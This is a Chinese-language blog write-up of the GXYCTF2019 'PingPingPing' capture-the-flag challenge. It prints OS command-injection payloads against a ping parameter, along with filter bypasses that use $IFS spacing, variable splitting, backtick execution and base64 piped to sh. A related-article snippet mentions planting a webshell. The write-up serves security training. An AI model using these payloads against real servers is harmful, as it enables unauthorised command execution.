专栏首页奝-大周GXYCTF2019-PingPingPing

GXYCTF2019-PingPingPing

题目地址:buuctf

打开题目

只有一个/?ip=

尝试传?ip=127.0.0.1,得到回显

利用管道符漏洞,传?ip=127.0.0.1||ls

看到flag.php 传?ip=127.0.0.1||cat%20flag.php

尝试传一下,得知如果我们传入的字符含有flag空格或者/,那么就会返回错误

这里用IFS1来绕过空格的限制,传?ip=127.0.0.1||catIFS1index.php

可以看到确实过滤了很多

这里我用三种办法

1.变量替换

preg_match("/.*f.*l.*a.*g.*/", $ip

因为这个会判断输入语句中是否按顺序出现f l a g,所以我们用

?ip=127.0.0.1||a=g;catIFS1fla

2.内敛执行

?ip=127.0.0.1||a=g;cat$IFS$1`ls`

3.sh

既然过滤了bash,那么可以用sh

?ip=127.0.0.1||echoIFS1Y2F0IGZsYWcucGhw|base64IFS1-d|sh

其中Y2F0IGZsYWcucGhw是base64加密之后的cat flag.php

关于命令执行的绕过,可以参考ghtwf01师傅的这篇文章:命令执行漏洞利用及绕过方式总结

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • ACTF2020新生赛-Exec

    emm..看到ping这个功能就想命令执行和管道符漏洞,就先输入127.0.0.1||ls

  • 管道符漏洞

    利用127.0.0.1&&echo '一句话' >1.php 将自己的马写到1.php中

  • CentOS配置docker和docker-compose

    最近在部署一个web服务,需要docker和docker-compose,遇到了许多问题,记录一下。

  • OpenCV-泛洪填充

    泛洪填充简单理解就是将指定颜色从指定位置开始填充一个连通区域,此时的连通性由像素值的接近程度来衡量。OpenCV中提供两种泛洪填充方式:

    触摸壹缕阳光
  • [享学Netflix] 三十二、Hystrix抛出HystrixBadRequestException异常为何不熔断?

    通过前面文章我们知道了,Hystrix是个强大的熔断降级框架:收集目标方法的成功、失败等指标信息,触发熔断器。其中失败信息通过异常来表示,交给Hystrix进行...

    YourBatman
  • 如何设计一个麻雀般的微型分布式架构?

    设计该系统初衷是基于描绘业务(或机器集群)存储模型,分析代理缓存服务器磁盘存储与回源率的关系。系统意义是在腾讯云成本优化过程中,量化指导机房设备扩容。前半部分是...

    Java高级架构
  • 腾讯云数据仓库 PostgreSQL:使用python将linux日志导入数据仓库

    通过官网我们知道,snova可以使用PostgreSQL工具,因此,如果想要将linux日志导入snova数据仓库,只需要调用 python3 中的 psyco...

    BH8ANK
  • 微型分布式架构设计范例

    设计该系统初衷是基于描绘业务(或机器集群)存储模型,分析代理缓存服务器磁盘存储与回源率的关系。

    mariolu
  • raft 系列解读(3) 之 代码实现最小规则followercandidateleader规则RequestVote RPCAppendEntries RPC

    首先,其实raft如果你不去看理论正确性的证明,光实现的话,只要按照raft里面给出的原则写代码就ok!如果代码写出来不正确,只能是你自己实现的问题。囧

    zhuanxu
  • 中级程序员还应该如何提高自己?

    当程序员已经处于中级时,应如何提高自己?有很多关于“学习编程”的资源,能够让人从0到新手(虽然这些资源中大多数的质量是值得商榷的),但是怎么样才能将中级水平提高...

    哲洛不闹

扫码关注云+社区

领取腾讯云代金券